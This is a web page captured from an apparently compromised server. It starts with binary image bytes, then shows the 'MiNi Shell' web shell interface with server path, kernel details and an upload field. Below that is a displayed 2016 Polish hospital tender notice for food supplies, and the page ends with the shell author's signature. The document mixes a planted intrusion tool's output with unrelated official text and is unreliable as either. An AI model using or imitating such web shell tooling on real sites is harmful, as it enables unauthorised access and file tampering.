JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160616/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160616/89039-N-2016.html

<p class="kh_header"><b>Bolesławiec: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH RÓŻNYCH (DRUGIE POSTĘPOWANIE)</b><br>
<b>Numer ogłoszenia: 89039 - 2016; data zamieszczenia: 16.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital dla Nerwowo i Psychicznie Chorych w Bolesławcu , al. Tysiąclecia 30, 59-700 Bolesławiec, woj. dolnośląskie, tel. 75 616 26 48 wew .317(sekretar, faks 75 616 26 83.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalpsychiatryczny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH RÓŻNYCH (DRUGIE POSTĘPOWANIE).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem postępowania jest udzielenie zamówienia w zakresie sukcesywnych dostaw artykułów spożywczych w asortymencie i ilościach podanych w załączniku nr 2 do Siwz (stanowiącym jednocześnie formularz cenowy) oraz na zasadach opisanych w załączniku nr 3 do Siwz (projekt umowy). (Lp., asortyment, ilość, gramatura jedn.):  
1.	Mąka pszenna typ 650	Kg	2000
2.	Biały barszcz	kg	200
	pakowany po 50 g. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział 40 - 60g)		
3.	Mąka ziemniaczana	Kg	50
4.	Zupa pieczarkowa	kg	150
	pakowana po 50 g. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział 40 - 60g)		
5.	Kasza jęczmienna	Kg	1800
6.	Fasolka konserwowa	kg	225
	pakowana po 450 g. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział 400 - 500g)		
7.	Groszek konserwowy	kg	120
	pakowany po 240 g. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział 240 - 400g)		
8.	Dżem	kg	572 -
	niskosłodzony, pakowany po 260 g. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział 250 - 400g)		
9.	Marmolada	kg	572
	pakowana po 260 g. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział 250 -400g)		
10.	Groch łuskany	Kg	350
11.	Herbata granulowana	kg	250
	pakowana po 100 g. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział 100 - 500g)		
12.	Herbata owocowa 	kg	60
	susz naturalny (luz) pakowany po 100 g. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział 100-600g)		
13.	Kawa zbożowa	Kg	250
	pakowana po 0,5 kg. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział 0,5 - 1kg)		
14.	Przyprawa do zup	l	380
	pakowana po 1l. w przypadku innej gramatury opakowania jedn. wpisać - l (dopuszczalny przedział 0,75 - 1 l)		
15.	Koncentrat pomidorowy	kg	225
	pakowany po 0,9 kg. w przypadku innej gramatury opakowania jedn. wpisać - kg (dopuszczalny przedział 0,8 - 1kg)		
16.	Kasza manna	Kg	700
17.	Płatki owsiane zwykłe	Kg	700
18.	Ryż	Kg	1300
19.	Sól	Kg	1800
20.	Pieprz naturalny mielony kg	15
	pakowany po 20 g. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział 20 - 40g)		
21.	Syrop owocowy l 400
	pakowany po 0,5 litra. w przypadku innej gramatury opakowania jedn. wpisać -  (dopuszczalny przedział 0,4 - 0,6l)		
22.	Majonez kg	146
	pakowany po 730 g. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział 650 - 800g)		
23.	Musztarda 	kg	54
	pakowana po 180 g. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział 150 - 200 g)		
24.	Kaszki mleczne owocowe 	kg	138
	pakowane po 230 g. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział 200 - 250 g)		
25.	Olej 	l	300
26.	Ocet 	l	200
27.	Kakao 	kg	20
	pakowane po 100 g. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział  100- 250 g)		
28.	Budyń  kg	11,4
	- bez cukru, pakowany po 38 g. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział 35 -  50g)		
29.	Kisiel kg	68,4
	- bez cukru, pakowany po 38 g. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział  35 - 50g)		
30.	Galaretka owocowa	kg	15
	pakowana po 75 g. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział  70 -  90g)		
31.	Ciastka różne 	Kg	100
	wyrob swieży o max terminie do spozycia 30 dni		
32.	Cukier waniliowy	kg	4,8
	pakowany po 16 g. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział 16 - 32 g)		
33.	Przyprawa jarzynka 	kg	100
	pakowana po 1 kg. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział 0,5 - 1kg)		
34.	Majeranek	kg	1
	pakowany po 5 g. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział  5 -  10g)		
35.	Papryka słodka mielona	kg	4
	pakowana po 20 g. w przypadku innej gramatury opakowania jedn. wpisać - g (dopuszczalny przedział  20- 40 g)		
36.	Makaron	kg	4000
37.	Cukier biały	kg	4000
38.	Wafel przekładany kremem kakaowym (lub innym) w czekoladzie	kg	14,4
	gramatura 48 g. w przypadku innej gramatury wpisać - g (dopuszczalny przedział  40-  55 g).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.00.00-0, 15.32.70.00-0, 15.40.00.00-2, 15.50.00.00-3, 15.61.00.00-7, 15.62.00.00-0, 15.81.20.00-3, 15.83.00.00-5, 15.84.00.00-8, 15.85.00.00-1, 15.87.00.00-7, 15.86.00.00-4, 15.89.00.00-3, 03.22.12.20-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca
zobowiązany jest wykazać w sposób szczególny. Ocena spełnienia przez Wykonawcę warunków
udziału w postępowaniu odbywać się będzie na zasadzie spełnia/nie spełnia w oparciu o informacje
zawarte w przedłożonych w ofercie oświadczeniach i dokumentach (opisanych w rozdziale VI SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca
zobowiązany jest wykazać w sposób szczególny. Ocena spełnienia przez Wykonawcę warunków
udziału w postępowaniu odbywać się będzie na zasadzie spełnia/nie spełnia w oparciu o informacje
zawarte w przedłożonych w ofercie oświadczeniach i dokumentach (opisanych w rozdziale VI SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca
zobowiązany jest wykazać w sposób szczególny. Ocena spełnienia przez Wykonawcę warunków
udziału w postępowaniu odbywać się będzie na zasadzie spełnia/nie spełnia w oparciu o informacje
zawarte w przedłożonych w ofercie oświadczeniach i dokumentach (opisanych w rozdziale VI SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca
zobowiązany jest wykazać w sposób szczególny. Ocena spełnienia przez Wykonawcę warunków
udziału w postępowaniu odbywać się będzie na zasadzie spełnia/nie spełnia w oparciu o informacje
zawarte w przedłożonych w ofercie oświadczeniach i dokumentach (opisanych w rozdziale VI SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca
zobowiązany jest wykazać w sposób szczególny. Ocena spełnienia przez Wykonawcę warunków
udziału w postępowaniu odbywać się będzie na zasadzie spełnia/nie spełnia w oparciu o informacje
zawarte w przedłożonych w ofercie oświadczeniach i dokumentach (opisanych w rozdziale VI SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a. wypełniony i podpisany Formularz oferty (załącznik nr 1 do Siwz); b. wypełniony i podpisany Formularz
asortymentowo - cenowy (załącznik nr 2 do Siwz); c. w przypadku oferty składanej wspólnie, pisemne
pełnomocnictwo dla osoby uprawnionej do reprezentowania pozostałych wykonawców w trakcie postępowania,
określające zakres umocowania; d. pełnomocnictwo do podpisania oferty, o ile umocowanie do dokonania
przedmiotowej czynności nie wynika z dokumentów rejestrowych załączonych do oferty; e. pisemne
zobowiązanie (w oryginale) podmiotów trzecich do oddania wykonawcy do dyspozycji niezbędnych zasobów
na potrzeby wykonania zamówienia - jeżeli dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Termin płatności - 10</li>
<li>3 - Termin rozpatrzenia reklamacji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwość dokonania zmian została ujęta w projekcie umowy, załącznik nr 3 do SIWZ (§ 6): 1.
Strony dopuszczają możliwość zmiany postanowień umowy w stosunku do treści oferty, na podstawie której
dokonano wyboru Wykonawcy w przypadku: 1.1. zmiany danych stron umowy (np. nazwy, siedziby, osób
reprezentujących, formy prawnej, a także zmiany organizacyjnej Wykonawcy, ale wyłącznie takiej, która nie
powoduje likwidacji Wykonawcy) 1.2. zmiany terminu realizacji umowy lub przesunięcie terminu realizacji
umowy, przy czym zmiana taka nie wpływa na jednostkowe ceny wskazane w ofercie. Zmiany te mogą
nastąpić w przypadku niewykorzystania przez Zamawiającego wartości brutto, o której mowa w § 4 ust. 1
umowy; 1.3. zmian podwykonawcy, jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na
którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b Pzp, w celu wykazania
spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 Pzp. Wykonawca jest
zobowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie
spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia. 1.4.
zmiany wynagrodzenia Wykonawcy: a. w sytuacji, o której mowa § 1 ust. 4 lit. f umowy - - zmniejszenia
zakładanej ilości zamawianych artykułów, w ramach zamówienia podstawowego, wskazanych w załączniku do
niniejszej umowy, co uzależnione będzie od rzeczywistych potrzeb Zamawiającego wynikających z jego bieżącej działalności, b. w przypadku ustawowych zmian stawki podatku VAT - - zmiana dotyczyć będzie
wynagrodzenia umownego brutto przy zachowaniu stałości cen netto, w części wynagrodzenia wykonawcy za
dostawy, których w dniu zmiany stawki podatku jeszcze nie zrealizowano, - zmiana następuje automatycznie
z dniem wejścia w życie aktu prawnego zmieniającego stawkę; 1.5. innych sytuacji: a. wstrzymania lub
zakończenia produkcji danego artykuły, lub zmiany jego gramatury, i możliwości dostarczania towaru
zastępczego, o zbliżonej gramaturze i nie gorszych parametrach, przy zachowaniu ceny jednostkowej
wskazanej w załączniku do umowy. 2. Wszelkie zmiany i uzupełnienia niniejszej umowy dokonywane będą w
formie pisemnego aneksu, pod rygorem nieważności. Zdanie pierwsze nie dotyczy sytuacji, o których mowa w
ust. 1.4 powyżej. 3. Zmiany lub wprowadzenie nowych postanowień umowy mogą mieć miejsce na zasadach
opisanych poniżej: 3.1. Wnioskowanie o zmianę - Strony: a. Wniosek Zamawiającego o dokonanie zmiany b.
Wniosek Zamawiającego, aby Wykonawca przedłożył propozycję c. Wniosek Wykonawcy o dokonanie
zmiany 3.2. Procedura wprowadzania zmian przez wnioskodawcę; a. Opis proponowanej zmiany b. Wpływ na
wykonanie przedmiotu umowy c. Termin wprowadzenia zmian d. Należy podać w jaki sposób / dlaczego
zmiana jest konieczna dla wykonania umowy. 3.3. Wniosek o zmianę składany przez Wykonawcę musi
wpłynąć pisemnie do Zamawiającego w terminie co najmniej 14 dni przed planowanym wprowadzeniem zmian.
Wnioski wniesione po terminie oraz wnioski niezawierające elementów opisanych powyżej nie będą
rozpatrywane</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.szpitalpsychiatryczny.bip.org.pl/?tree=przetarg<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital dla Nerwowo i Psychicznie Chorych w Bolesławcu, Aleja Tysiąclecia 30, 59-700 Bolesławiec, pawilon administracji
(dział organizacyjno - prawny - II piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2016 godzina 10:00, miejsce: Wojewódzki Szpital dla Nerwowo i Psychicznie Chorych w Bolesławcu, Aleja
Tysiąclecia 30, 59-700 Bolesławiec, Sekretariat Szpitala, pok. 101 (pawilon administracji).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com